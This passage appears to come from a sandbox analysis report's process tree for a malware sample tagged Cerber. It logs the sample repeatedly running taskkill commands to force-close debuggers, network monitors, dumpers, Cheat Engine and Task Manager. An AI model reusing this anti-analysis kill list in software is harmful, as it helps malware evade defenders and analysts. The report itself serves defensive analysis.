  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      Kills process with taskkill
      PID:2588
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:3316
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Cerber
      PID:784
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:3792
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:3800
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      Kills process with taskkill
      PID:900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4200
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:3376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:4908
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:392
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:4912
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2404
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      Kills process with taskkill
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1244
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2672
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:1180
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:4628
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:1516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      Cerber
      PID:1308
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:3060
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Kills process with taskkill
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:2104
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      PID:4232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:64
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Cerber
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:4444
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      PID:1512
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:3556
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:4184
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      Cerber
      PID:824
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:2624
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Kills process with taskkill
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:3856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      Cerber
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:2896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      PID:4736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:3112
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Cerber
      PID:5064
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:4320
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:1180
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1144
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      PID:1536
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:1516
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      PID:4836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:2684
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      PID:3388
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:2068
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:636
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      Kills process with taskkill
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:2856
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      PID:3728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:1888
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Cerber
      PID:1572
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4560
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:4908
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:4792
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      PID:392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:2020
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      PID:4912
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:224
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:3712
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2788
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      Cerber
      PID:3820
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:1048
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4196
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:2444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:4848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:3316
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Cerber
      PID:928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:3060
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:4728
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:1448
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:3792
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:900
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      Kills process with taskkill
      PID:3800
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:3376
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      Kills process with taskkill
      PID:1868
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:5056
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Kills process with taskkill
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:4092
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:1336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:4296
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4184
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:4476
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Cerber
      Kills process with taskkill
      PID:2532
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:4632
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      Kills process with taskkill
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:2676
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Kills process with taskkill
      PID:4592
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      Kills process with taskkill
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:4628
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:1536
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:3660
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Cerber
      PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:436
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      Cerber
      PID:2492
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:3392
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      PID:2688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:4116
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      Kills process with taskkill
      PID:2288
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:1852
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      Cerber
      PID:2324
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:3264
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1620
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4228
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:3564
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      PID:2208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:3676
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      Kills process with taskkill
      PID:2904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:3340
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      Cerber
      PID:2624
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:4996
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      Kills process with taskkill
      PID:644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:4736
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTP Debugger Windows Service (32 bit).exe
      4⤵
      PID:896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:4592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      PID:2676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:2280
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      PID:1976
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x64dbg.exe >nul 2>&1
    3⤵
    PID:4648
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x64dbg.exe
      4⤵
      PID:1616
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im x32dbg.exe >nul 2>&1
    3⤵
    PID:4468
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im x32dbg.exe
      4⤵
      PID:1688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:5108
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:4428
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:4988
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:2104
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:4864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&1
    3⤵
    PID:3060
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Ida64.exe
      4⤵
      PID:2068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&1
    3⤵
    PID:4488
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im OllyDbg.exe
      4⤵
      Kills process with taskkill
      PID:2372
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg64.exe >nul 2>&1
    3⤵
    PID:4440
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg64.exe
      4⤵
      PID:2660
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Dbg32.exe >nul 2>&1
    3⤵
    PID:4472
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Dbg32.exe
      4⤵
      PID:732
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Taskmgr.exe >nul 2>&1
    3⤵
    PID:4896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Taskmgr.exe
      4⤵
      Kills process with taskkill
      PID:4228
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2208
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T
      4⤵
      PID:3564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&1
    3⤵
    PID:2904
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T
      4⤵
      PID:3676
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&1
    3⤵
    PID:224
  - - C:\Windows\system32\taskkill.exe
      taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T
      4⤵
      PID:1244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumperClient.exe >nul 2>&1
    3⤵
    PID:5064
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumperClient.exe
      4⤵
      Cerber
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im KsDumper.exe >nul 2>&1
    3⤵
    PID:896
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im KsDumper.exe
      4⤵
      Kills process with taskkill
      PID:1180
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&1
    3⤵
    PID:4592
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerUI.exe
      4⤵
      PID:1220
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&1
    3⤵
    PID:1976
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im HTTPDebuggerSvc.exe
      4⤵
      PID:2280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im ProcessHacker.exe >nul 2>&1
    3⤵
    PID:4352
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im ProcessHacker.exe
      4⤵
      Kills process with taskkill
      PID:4208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq.exe >nul 2>&1
    3⤵
    PID:4848
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq.exe
      4⤵
      PID:4240
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im idaq64.exe >nul 2>&1
    3⤵
    PID:3388
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im idaq64.exe
      4⤵
      Cerber
      PID:1960
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:1080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Wireshark.exe >nul 2>&1
    3⤵
    PID:4772
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Wireshark.exe
      4⤵
      PID:4088
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Fiddler.exe >nul 2>&1
    3⤵
    PID:2492
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Fiddler.exe
      4⤵
      PID:3392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im FiddlerEverywhere.exe >nul 2>&1
    3⤵
    PID:2688
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im FiddlerEverywhere.exe
      4⤵
      PID:3688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos64.exe >nul 2>&1
    3⤵
    PID:2288
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos64.exe
      4⤵
      Cerber
      PID:64
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos.exe >nul 2>&1
    3⤵
    PID:3800
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos.exe
      4⤵
      PID:4068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Xenos32.exe >nul 2>&1
    3⤵
    PID:732
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Xenos32.exe
      4⤵
      PID:4472
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im de4dot.exe >nul 2>&1
    3⤵
    PID:4560
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im de4dot.exe
      4⤵
      PID:2548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im Cheat Engine.exe >nul 2>&1
    3⤵
    PID:640
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im Cheat Engine.exe
      4⤵
      Kills process with taskkill
      PID:3560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:2532
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:1864
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:1584
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64-SSE4-AVX2.exe
      4⤵
      PID:3340
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe >nul 2>&1
    3⤵
    PID:4632
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-x86_64-SSE4-AVX2.exe
      4⤵
      PID:4996
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im MugenJinFuu-i386.exe >nul 2>&1
    3⤵
    PID:1048
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im MugenJinFuu-i386.exe
      4⤵
      Cerber
      PID:3896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-x86_64.exe >nul 2>&1
    3⤵
    PID:2044
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-x86_64.exe
      4⤵
      PID:3900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im cheatengine-i386.exe >nul 2>&1
    3⤵
    PID:4644
  - - C:\Windows\system32\taskkill.exe
      taskkill /f /im cheatengine-i386.exe
      4⤵
      PID:3244
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c cls
    3⤵
    PID:736
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c taskkill /f /im HTTP Debugger Windows Service (32 bit).exe >nul 2>&1
    3⤵
    PID:1188
  - - C:\Windows\system32\taskkill.exe
